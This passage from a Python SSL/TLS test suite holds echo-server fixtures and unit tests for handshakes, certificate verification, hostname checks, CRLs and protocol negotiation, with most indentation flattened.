# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
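
# Illustrative sketch (not part of the test suite): the non-blocking
# handshake loop used by test_non_blocking_connect_ex() and
# test_non_blocking_handshake() above, as a standalone helper.  The 5-second
# select timeout is an arbitrary choice for the sketch.
def _example_nonblocking_handshake(sslsock, timeout=5.0):
    while True:
        try:
            sslsock.do_handshake()
            return
        except ssl.SSLWantReadError:
            select.select([sslsock], [], [], timeout)
        except ssl.SSLWantWriteError:
            select.select([], [sslsock], [], timeout)
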
@support.requires_resource('network')
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with socket_helper.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
elif rc == errno.ENETUNREACH:
self.skipTest("Network unreachable.")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with socket_helper.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(True)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError, ConnectionAbortedError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
#
# ConnectionAbortedError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake when using WinSock.
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
                # OSError may occur with wrong protocols, e.g. when both
                # sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
# bpo-44229, bpo-43855, bpo-44237, and bpo-33450:
# Ignore spurious EPROTOTYPE returned by write() on macOS.
# See also http://erickt.github.io/blog/2014/11/19/adventures-in-debugging-a-potential-osx-kernel-bug/
if e.errno != errno.EPROTOTYPE and sys.platform != "darwin":
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
if cert_binary is None:
sys.stdout.write(" client did not provide a cert\n")
else:
sys.stdout.write(f" cert binary is {len(cert_binary)}b\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
elif stripped == b'PHA':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: initiating post handshake auth\n")
try:
self.sslconn.verify_client_post_handshake()
except ssl.SSLError as e:
self.write(repr(e).encode("us-ascii") + b"\n")
else:
self.write(b"OK\n")
elif stripped == b'HASCERT':
if self.sslconn.getpeercert() is not None:
self.write(b'TRUE\n')
else:
self.write(b'FALSE\n')
elif stripped == b'GETCERT':
cert = self.sslconn.getpeercert()
self.write(repr(cert).encode("us-ascii") + b"\n")
elif stripped == b'VERIFIEDCHAIN':
certs = self.sslconn._sslobj.get_verified_chain()
self.write(len(certs).to_bytes(1, "big") + b"\n")
elif stripped == b'UNVERIFIEDCHAIN':
certs = self.sslconn._sslobj.get_unverified_chain()
self.write(len(certs).to_bytes(1, "big") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError as e:
# handles SSLError and socket errors
if self.server.chatty and support.verbose:
if isinstance(e, ConnectionError):
# OpenSSL 1.1.1 sometimes raises
# ConnectionResetError when connection is not
# shut down gracefully.
print(
f" Connection reset by peer: {self.addr}"
)
else:
handle_error("Test server failure:\n")
try:
self.write(b"ERROR\n")
except OSError:
pass
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = socket_helper.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(1.0)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except TimeoutError as e:
if support.verbose:
sys.stdout.write(f' connection timeout {e!r}\n')
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.close()
def close(self):
if self.sock is not None:
self.sock.close()
self.sock = None
def stop(self):
self.active = False
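
# Illustrative sketch (not part of the test suite): how a client drives the
# STARTTLS protocol implemented by ConnectionHandler.run() above, against a
# ThreadedEchoServer created with starttls_server=True.  The context is
# assumed to be a client context that trusts the server's certificate.
def _example_starttls_client(addr, context, hostname=None):
    with socket.create_connection(addr) as sock:
        # The STARTTLS exchange happens in the clear; the server answers
        # b"OK\n" and only then wraps its side of the connection.
        sock.sendall(b"STARTTLS\n")
        assert sock.recv(1024).strip() == b"OK"
        with context.wrap_socket(sock, server_hostname=hostname) as ssock:
            ssock.sendall(b"ping\n")
            return ssock.recv(1024)   # echoed back lower-cased by the server
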
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
    class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
    def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
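
# Illustrative sketch (not part of the test suite): the pattern most
# ThreadedTests below follow when they call server_params_test().
# testing_context() is the suite's own fixture defined earlier in the file.
def _example_server_params_test_usage():
    client_context, server_context, hostname = testing_context()
    stats = server_params_test(client_context, server_context,
                               chatty=False, connectionchatty=False,
                               sni_name=hostname)
    # The returned dict records the negotiated parameters of the connection.
    return stats['version'], stats['cipher'], stats['peercert']
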
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
    If *expect_success* is true, assert that the connection succeeds;
    if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
with warnings_helper.check_warnings():
# ignore Deprecation warnings
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
min_version = PROTOCOL_TO_TLS_VERSION.get(client_protocol, None)
if (min_version is not None
# SSLContext.minimum_version is only available on recent OpenSSL
# (setter added in OpenSSL 1.1.0, getter added in OpenSSL 1.1.1)
and hasattr(server_context, 'minimum_version')
and server_protocol == ssl.PROTOCOL_TLS
and server_context.minimum_version > min_version
):
# If OpenSSL configuration is strict and requires more recent TLS
# version, we have to change the minimum to test old TLS versions.
with warnings_helper.check_warnings():
server_context.minimum_version = min_version
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
seclevel_workaround(server_context, client_context)
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
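
# Illustrative sketch (not part of the test suite): the three meanings of
# expect_success described in try_protocol_combo()'s docstring, using the
# auto-negotiating PROTOCOL_TLS constants the helper itself special-cases.
def _example_try_protocol_combo_usage():
    with warnings_helper.check_warnings():
        # True: the connection merely has to succeed.
        try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
        # A string: the connection has to succeed *and* negotiate exactly
        # that protocol version.
        try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
        # False: the connection has to fail (a server-side context cannot be
        # used to create a client socket).
        try_protocol_combo(ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_SERVER, False)
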
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception)
)
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception)
)
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
                # getpeercert() raises ValueError while the handshake isn't
                # done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
@unittest.skipUnless(
ssl.HAS_NEVER_CHECK_COMMON_NAME, "test requires hostname_checks_common_name"
)
def test_hostname_checks_common_name(self):
client_context, server_context, hostname = testing_context()
assert client_context.hostname_checks_common_name
client_context.hostname_checks_common_name = False
# default cert has a SAN
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
client_context, server_context, hostname = testing_context(NOSANFILE)
client_context.hostname_checks_common_name = False
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLCertVerificationError):
s.connect((HOST, server.port))
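    # test_ecc_cert: the client limits its cipher string to ECDHE/ECDSA suites
    # and the server only loads an ECC certificate, so the handshake should
    # succeed with that certificate.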
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
                self.assertEqual(cipher[:2], ['ECDHE', 'ECDSA'])
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@requires_tls_version('TLSv1_3')
def test_wrong_cert_tls13(self):
